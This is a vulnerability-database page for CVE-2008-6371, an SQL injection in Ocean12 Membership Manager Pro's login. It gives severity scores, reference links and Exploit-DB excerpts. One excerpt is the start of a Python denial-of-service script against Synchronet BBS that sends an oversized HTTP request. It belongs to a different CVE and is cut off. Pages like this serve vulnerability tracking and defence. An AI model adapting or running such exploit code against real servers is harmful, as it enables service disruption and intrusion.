CVE-2008-6371
published 2009-03-02CVE-2008-6371: SQL injection vulnerability in login.asp in Ocean12 Membership Manager Pro allows remote attackers to execute arbitrary SQL commands via the username (Username…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.00%
78.4th percentile
SQL injection vulnerability in login.asp in Ocean12 Membership Manager Pro allows remote attackers to execute arbitrary SQL commands via the username (Username parameter).
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Synchronet BBS 3.16c - Denial of Service
exploitdb·2017-02-28·CVSS 7.5
CVE-2017-6371 [HIGH] Synchronet BBS 3.16c - Denial of Service
Synchronet BBS 3.16c - Denial of Service
---
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6371
import socket
import time
import sys
try:
host = sys.argv[1]
port = 80
except IndexError:
print "[+] Usage %s " % sys.argv[0]
sys.exit()
exploit = "\x41"*4096
buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml
Exploit-DB
Ocean12 Membership Manager Pro - Authentication Bypass
exploitdb·2008-11-27
CVE-2008-6390 Ocean12 Membership Manager Pro - Authentication Bypass
Ocean12 Membership Manager Pro - Authentication Bypass
---
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO Mor0ccan nightamres Will Be The Best The_5p3ctrum , BayHay & Me :) [!]
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ] ++
+--
No writeups or analysis indexed.
http://osvdb.org/50318http://secunia.com/advisories/32893http://www.securityfocus.com/bid/32508https://exchange.xforce.ibmcloud.com/vulnerabilities/46959https://www.exploit-db.com/exploits/7254http://osvdb.org/50318http://secunia.com/advisories/32893http://www.securityfocus.com/bid/32508https://exchange.xforce.ibmcloud.com/vulnerabilities/46959https://www.exploit-db.com/exploits/7254
2009-03-02
Published